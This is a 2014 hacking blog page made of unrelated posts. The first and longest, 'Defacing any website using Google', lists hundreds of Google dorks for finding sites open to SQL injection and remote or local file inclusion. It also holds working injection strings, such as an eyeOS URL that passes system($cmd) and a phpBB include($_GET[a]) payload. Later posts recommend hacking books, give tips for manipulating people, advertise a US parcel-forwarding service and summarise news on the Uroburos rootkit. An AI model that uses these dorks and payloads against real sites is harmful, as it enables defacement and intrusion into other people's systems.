Saturday, March 22, 2014

DEFACING ANY WEBSITE USING GOOGLE

HERE ARE JUST A FEW GOOGLE DORKS THAT CAN BE USED FOR SQL INJECTIONS
THIS POST IS NOT FOR NEWBIES ON THE INTERNET, ONLY FOR THOSE WHO UNDERSTAND WHAT SQL INJECTIONS ARE AND HOW THEY ARE USED. . 


aftr 6line ad dis at d end
 you can find vuln. site and you are ready to Sql injection.
PHP DORK
inurl:(0x3a,version
inurl@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=
ASP DORK
nurl:”add.asp?bookid=”
inurl:”add_cart.asp?num=”
inurl:”addcart.asp?”
inurl:”addItem.asp”
inurl:”add-to-cart.asp?ID=”
inurl:”addToCart.asp?idProduct=”
inurl:”addtomylist.asp?ProdId=”
inurl:”adminEditProductFields.asp?intProdID=”
inurl:”advSearch_h.asp?idCategory=”
inurl:”affiliate.asp?ID=”
inurl:”affiliate-agreement.cfm?storeid=”
inurl:”affiliates.asp?id=”
inurl:”ancillary.asp?ID=”
inurl:”archive.asp?id=”
inurl:”article.asp?id=”
inurl:”aspx?PageID”
inurl:”basket.asp?id=”
inurl:”Book.asp?bookID=”
inurl:”book_list.asp?bookid=”
inurl:”book_view.asp?bookid=”
inurl:”BookDetails.asp?ID=”
inurl:”browse.asp?catid=”
inurl:”browse_item_details.asp”
inurl:”Browse_Item_Details.asp?Store_Id=”
inurl:”buy.asp?”
inurl:”buy.asp?bookid=”
inurl:”bycategory.asp?id=”
inurl:”cardinfo.asp?card=”
inurl:”cart.asp?action=”
inurl:”cart.asp?cart_id=”
inurl:”cart.asp?id=”
inurl:”cart_additem.asp?id=”
inurl:”cart_validate.asp?id=”
inurl:”cartadd.asp?id=”
inurl:”cat.asp?iCat=”
inurl:”catalog.asp”
inurl:”catalog.asp?CatalogID=”
inurl:”catalog_item.asp?ID=”
inurl:”catalog_main.asp?catid=”
inurl:”category.asp”
inurl:”category.asp?catid=”
inurl:”category_list.asp?id=”
inurl:”categorydisplay.asp?catid=”
inurl:”checkout.asp?cartid=”
inurl:”checkout.asp?UserID=”
inurl:”checkout_confirmed.asp?order_id=”
inurl:”checkout1.asp?cartid=”
inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
inurl:”comersus_optReviewReadExec.asp?idProduct=”
inurl:”comersus_viewItem.asp?idProduct=”
inurl:”comments_form.asp?ID=”
inurl:”contact.asp?cartId=”
inurl:”content.asp?id=”
inurl:”customerService.asp?TextID1=”
inurl:”default.asp?catID=”
inurl:”description.asp?bookid=”
inurl:”details.asp?BookID=”
inurl:”details.asp?Press_Release_ID=”
inurl:”details.asp?Product_ID=”
inurl:”details.asp?Service_ID=”
inurl:”display_item.asp?id=”
inurl:”displayproducts.asp”
inurl:”downloadTrial.asp?intProdID=”
inurl:”emailproduct.asp?itemid=”
inurl:”emailToFriend.asp?idProduct=”
inurl:”events.asp?ID=”
inurl:”faq.asp?cartID=”
inurl:”faq_list.asp?id=”
inurl:”faqs.asp?id=”
inurl:”feedback.asp?title=”
inurl:”freedownload.asp?bookid=”
inurl:”fullDisplay.asp?item=”
inurl:”getbook.asp?bookid=”
inurl:”GetItems.asp?itemid=”
inurl:”giftDetail.asp?id=”
inurl:”help.asp?CartId=”
inurl:”home.asp?id=”
inurl:”index.asp?cart=”
inurl:”index.asp?cartID=”
inurl:”index.asp?ID=”
inurl:”info.asp?ID=”
inurl:”item.asp?eid=”
inurl:”item.asp?item_id=”
inurl:”item.asp?itemid=”
inurl:”item.asp?model=”
inurl:”item.asp?prodtype=”
inurl:”item.asp?shopcd=”
inurl:”item_details.asp?catid=”
inurl:”item_list.asp?maingroup”
inurl:”item_show.asp?code_no=”
inurl:”itemDesc.asp?CartId=”
inurl:”itemdetail.asp?item=”
inurl:”itemdetails.asp?catalogid=”
inurl:”learnmore.asp?cartID=”
inurl:”links.asp?catid=”
inurl:”list.asp?bookid=”
inurl:”List.asp?CatID=”
inurl:”listcategoriesandproducts.asp?idCategory=”
inurl:”modline.asp?id=”
inurl:”myaccount.asp?catid=”
inurl:”news.asp?id=”
inurl:”order.asp?BookID=”
inurl:”order.asp?id=”
inurl:”order.asp?item_ID=”
inurl:”OrderForm.asp?Cart=”
inurl:”page.asp?PartID=”
inurl:”payment.asp?CartID=”
inurl:”pdetail.asp?item_id=”
inurl:”powersearch.asp?CartId=”
inurl:”privacy.asp?cartID=”
inurl:”prodbycat.asp?intCatalogID=”
inurl:”prodetails.asp?prodid=”
inurl:”prodlist.asp?catid=”
inurl:”product.asp?bookID=”
inurl:”product.asp?intProdID=”
inurl:”product_info.asp?item_id=”
inurl:”productDetails.asp?idProduct=”
inurl:”productDisplay.asp”
inurl:”productinfo.asp?item=”
inurl:”productlist.asp?ViewType=Category&CategoryID= ”
inurl:”productpage.asp”
inurl:”products.asp?ID=”
inurl:”products.asp?keyword=”
inurl:”products_category.asp?CategoryID=”
inurl:”products_detail.asp?CategoryID=”
inurl:”productsByCategory.asp?intCatalogID=”
inurl:”prodView.asp?idProduct=”
inurl:”promo.asp?id=”
inurl:”promotion.asp?catid=”
inurl:”pview.asp?Item=”
inurl:”resellers.asp?idCategory=”
inurl:”results.asp?cat=”
inurl:”savecart.asp?CartId=”
inurl:”search.asp?CartID=”
inurl:”searchcat.asp?search_id=”
inurl:”Select_Item.asp?id=”
inurl:”Services.asp?ID=”
inurl:”shippinginfo.asp?CartId=”
inurl:”shop.asp?a=”
inurl:”shop.asp?action=”
inurl:”shop.asp?bookid=”
inurl:”shop.asp?cartID=”
inurl:”shop_details.asp?prodid=”
inurl:”shopaddtocart.asp”
inurl:”shopaddtocart.asp?catalogid=”
inurl:”shopbasket.asp?bookid=”
inurl:”shopbycategory.asp?catid=”
inurl:”shopcart.asp?title=”
inurl:”shopcreatorder.asp”
inurl:”shopcurrency.asp?cid=”
inurl:”shopdc.asp?bookid=”
inurl:”shopdisplaycategories.asp”
inurl:”shopdisplayproduct.asp?catalogid=”
inurl:”shopdisplayproducts.asp”
inurl:”shopexd.asp”
inurl:”shopexd.asp?catalogid=”
inurl:”shopping_basket.asp?cartID=”
inurl:”shopprojectlogin.asp”
inurl:”shopquery.asp?catalogid=”
inurl:”shopremoveitem.asp?cartid=”
inurl:”shopreviewadd.asp?id=”
inurl:”shopreviewlist.asp?id=”
inurl:”ShopSearch.asp?CategoryID=”
inurl:”shoptellafriend.asp?id=”
inurl:”shopthanks.asp”
inurl:”shopwelcome.asp?title=”
inurl:”show_item.asp?id=”
inurl:”show_item_details.asp?item_id=”
inurl:”showbook.asp?bookid=”
inurl:”showStore.asp?catID=”
inurl:”shprodde.asp?SKU=”
inurl:”specials.asp?id=”
inurl:”store.asp?id=”
inurl:”store_bycat.asp?id=”
inurl:”store_listing.asp?id=”
inurl:”Store_ViewProducts.asp?Cat=”
inurl:”store-details.asp?id=”
inurl:”storefront.asp?id=”
inurl:”storefronts.asp?title=”
inurl:”storeitem.asp?item=”
inurl:”StoreRedirect.asp?ID=”
inurl:”subcategories.asp?id=”
inurl:”tek9.asp?”
inurl:”template.asp?Action=Item&pid=”
inurl:”topic.asp?ID=”
inurl:”tuangou.asp?bookid=”
inurl:”type.asp?iType=”
inurl:”updatebasket.asp?bookid=”
inurl:”updates.asp?ID=”
inurl:”view.asp?cid=”
inurl:”view_cart.asp?title=”
inurl:”view_detail.asp?ID=”
inurl:”viewcart.asp?CartId=”
inurl:”viewCart.asp?userID=”
inurl:”viewCat_h.asp?idCategory=”
inurl:”viewevent.asp?EventID=”
inurl:”viewitem.asp?recor=”
inurl:”viewPrd.asp?idcategory=”
inurl:”ViewProduct.asp?misc=”
inurl:”voteList.asp?item_ID=”
inurl:”whatsnew.asp?idCategory=”
inurl:”WsAncillary.asp?ID=”
SQL DORK
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurl:(0x3a,version
inurl@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
RFI AND LFI
RFI
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x=
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualizar=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
inurl:/livehelp/inc/pipe.php?HCL_path=
inurl:/hcl/inc/pipe.php?HCL_path=
inurl:/inc/pipe.php?HCL_path=
inurl:/support/faq/inc/pipe.php?HCL_path=
inurl:/help/faq/inc/pipe.php?HCL_path=
inurl:/helpcenter/inc/pipe.php?HCL_path=
inurl:/live-support/inc/pipe.php?HCL_path=
inurl:/gnu3/index.php?doc=
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
inurl:/forum/install.php?phpbb_root_dir=
inurl:/includes/calendar.php?phpc_root_path=
inurl:/includes/setup.php?phpc_root_path=
inurl:/inc/authform.inc.php?path_pre=
inurl:/include/authform.inc.php?path_pre=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk
INURL OR ALLINURL WITH:
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. allinurl:ihm.php?p=
7. Keyword : “powered by AllMyLinks”
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=
11. keyword : “Powered by phpBB 2.0.6″
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=
12. keyword : “powered by CubeCart 3.0.6″
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
13. keyword : “powered by paBugs 2.0 Beta 3″
/class.mysql.php?path_to_bt_dir=
14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=
15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
16. allinurl:ihm.php?p=*
14. keyword : “powered eyeOs”
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=
15. allinurl:.php?bodyfile=
16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
17. allinurl:forums.html
/modules.php?name=
18. allinurl:/default.php?page=home
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
22. allinurl:application.php?base_path=
/application.php?base_path=
23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=
24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
25. key word : “powered by Fantastic News v2.1.2″
/archive.php?CONFIG[script_path]=
26. keyword: “powered by smartblog” AND inurl:?page=login
/index.php?page=
27. allinurl:/forum/
/forum/admin/index.php?inc_conf=
28. keyword:”Powered By FusionPHP”
/templates/headline_temp.php?nst_inc=
29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=
30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=
31. keyword : “Powered by iUser”
/common.php?include_path=
32. allinurl: “static.php?load=”
/static.php?load=
33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=
35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
LFI
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

THE BEST HACKING BOOKS YOU MUST READ TO BECOME A HACKER

best hacking books for beginner hacker
Hacking is considered to be a two-way tool wherein a computer system is penetrated either to make it more secure or to create mischief. Ethical hacking is defined as making use of programming skills, so as to penetrate a computer system, and determine its vulnerabilities. The ethical hackers are skilled computer experts, often called as the “white hats”. As against non-ethical hackers or “black hats” that penetrate into a computer system and exploit it for their own personal gains or mischief, the “white hats” evaluate and point out the vulnerabilities of system software, and suggest system changes to make it less penetrable.
With an increase in the use of Internet, concerns regarding its security have also grown manifold. This is particularly true in the case of highly confidential data. There have been past instances where the sites owned by even the most influential organizations have been hacked. This calls for designing systems which are impenetrable or an identification of the weaknesses of an existing system. Due to this reason, there is now a high demand for computer experts who can conduct ethical hacking operations.
Most of the organizations seek to acquire ethical hacking services from full-time employees or consultants so as to ensure security of their systems and information, thus making ethical hacking a highly lucrative profession.
Some of the best how to hack books that an aspiring ethical hacker must read are:

Hacking: The Art of Exploitation, 2nd Edition

This is one of the best books which will take you through the technicalities of areas like programming, shell code and exploitation. Regardless of whether you are a beginner or have very little hacking knowledge, this book will help you understand the complexities of the digital security tasks.
This excellent and well written book will make you learn all the clever stuff of getting access to a system. All in all, the best book to buy.

The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)

The best thing about this book is that it covers all the basics of penetration testing and hacking, without assuming that the reader has any prior hacking knowledge. It provides a step-by-step journey of penetration testing, moving from Information Gathering to Scanning, Exploitation and finally, Report Writing.
Instead of dealing with individual concepts in-depth, this book will provide you with a wholesome picture of hacking.

Metasploit: The Penetration Tester's Guide

This book deals with Penetration Testing by making use of the open source Metasploit Framework testing. It is suitable for readers who have no prior knowledge of Metasploit. The tutorial-like style of the book makes you learn things by doing them.
The ending of the book provides you with an actual penetration test’s simulated version so as to provide you with a realistic experience.

BackTrack 5 Wireless Penetration Testing Beginner's Guide

Right from the beginning, this book gives you what you need, without wasting time in unnecessary justifications. Instead of explaining only theoretical concepts, the book consists of finely tuned and crystal clear tutorials. It provides a good mix of basics and high level knowledge and works cohesively with the reader.

CEH Certified Ethical Hacker All-in-One Exam Guide

This is undoubtedly one of the most well written books of all times. It provides crisp and clear writing with relevant examples along with a humorous touch to enliven the dry and mundane subject. The contents of the book are well organized in a neither too chatty nor too dry manner. However, you require some basic networking background to derive full benefits from this book.

CompTIA Security+: Get Certified Get Ahead: SY0-301 Study Guide

This certification book is easy to read, straightforward and explains some of the complex topics in an excellent manner. All you need to do in order to pass the test is to read the book and do the practice exercises.
In addition to this, the “remember this sections” and the content headers highlight all the key topics that one must pay attention to. So, if you wish to straightaway get down to the study material without wasting time on esoteric gibberish, this is the book for you.

Although, hacking may sound like an interesting area of study, when it comes to the application of the various concepts of penetration testing, it is easier said than done. In addition to having an educational background in the field of computer science, the hackers must have an affinity to learning and acquiring new skills on an ongoing basis. Also, the ethical hackers must possess out-of-the box thinking so that they are able to come with maximum number of possible ways of designing and securing a computer system.

SOCIAL HACKING YOU DIDNT KNOW OF


Either in business, or social activities, these are a few social hacks you can use to manipulate people

1. Whenever someone is angry and confrontational, stand next to them instead of in front of them. You won’t appear as so much of a threat, and they eventually calm down.

2. Open with “I need your help.” People don’t like the guilt of not helping someone out. When asking for a favor from someone, begin your request by saying “I need your help.” It greatly increases your chances of getting that favor done. 

3. Rephrase what the other person says and repeat it back to them. This makes them think you’re listening and really interested in what they’re saying. It makes them feel validated. Obviously, you don’t want to overdo this.

4. If you want someone to agree with you, nod while you talk.This gets the other person to nod too, and they begin to subconsciously think they agree with you.

5. If someone doesn’t like you, ask to borrow a pencil. It is a small enough favor that they won’t say no, and it gets them to like you more.

6. Fold your arms to determine interest. If someone is observing you, they will likely mimic you. Fold your arms, and see if they do it, too.

7. Repeat a person’s name many times during a conversation. It helps you remember it, and makes them like you more.

GET A U.S ADDRESS IN NIGERIA AND RUN A VERIFIED PAYPAL ACCOUNT TO SHOP ONLINE AND SHIP ANYWHERE IN THE WORLD

Have you ever wanted to purchase a product you really loved online, and you just found out that it wasn't available to you country, can be frustrating right. 

Recently i discovered a method i can use to pay for products online and get them shipped directly to my house through a virtual address that routes my packages direct to my house


The benefits of this is that
  • You can get your own commercial or individual house address
  • Get a U.S phone number that divert calls right to your mobile phone number anytime
  • Purchase goods and shop online with any U.S Merchant and have them sent to your location using your virtual address
  • With the address you can apply for a U.S Visa Debit card and purchase products online without limit, as long as you have funds in your local account
To get started visit MyUS adresss, the number 1 ranked provider of consolidation services in the world, with a proudly maintained accreditation with the Better Business Bureau since 2008.

Access their services using the following membership plans
 

  • Standard - ideal for the those with only an occasional shipment
  • Premium - best for avid shoppers that would benefit from package consolidation
  • Premium +Mail - Premium with the added ability to receive mail and catalogs.
Why you would love myU.S is because,
  • They have a high level of concern for security, they verify your packages, to make sure they meet to specs for the product purchased
  • Fast track shipping, with hand delivery
  • Fraud free and has various add-on services you would love, even if you don't have a credit card, MyUs can purchase to goods for you, charge you directly and ship to you

 

Tuesday, March 18, 2014

THE UROBUROS MALWARE: HOW RUSSIA MIGHT BE THE ONES HACKING COMPUTERS IN UKRAINE USING CYBER WARFARE

If you think russia wont join their counterparts in other countries in privacy and hack expliots this year, then uroburos is questionable

RTX11PGR
An electronic-mechanical typewriter with a Cyrillic keyboard is pictured at the headquarter of the German firm Olympia Business Systems in Hattingen near the western German city of Wuppertal July 17, 2013. REUTERS/Wolfgang Rattay
Dozens of Ukrainian computer networks, including government systems, have reportedly been infected by an “aggressive cyberweapon” called Snake or Uroburos, supposedly created in Russia.
The British-based security firm BAE Systems has identified 14 instances of Uroburos in Ukraine in 2014, the earliest instances of which were before the Euromaidan protests even heated up. Experts haven't identified specific victims of Uroburos attacks, but its sophisticated nature suggests it was designed to attack high-value targets like government networks and telecom systems.
The malware expertly bypasses sophisticated Windows security measures and can steal data and capture network traffic, according to Hacker News. Experts say Uroburos could have been active up to three years ago and gone undetected since then, which would be a testament to how sophisticated it is.
More specifically, Uroburos is a rootkit, a type of software whose primary function is to hide functions and processes in a system. It acts like a stealth cloak that allows someone to basically do whatever they please on a system without being detected.
G Data Software, a German-American cybersecurity firm that has researched Uroburos extensively, coined the named Uroburos after finding several instances of the world embedded in the malware’s code. There’s even a line of code that reads “Uroburos got you,” stylized to suggest the programmers got the name from a webcomic called Homestuck, of all places.
There’s also several references to snakes found in the rootkit’s code, prompting the name Snake for the larger toolkit software Uroburos is a part of.
Can Uroburos Be Tracked To The Russian Government?
It’s incredibly sophisticated nature suggest to experts that it was developed not by cybercriminals, but by a state agency.
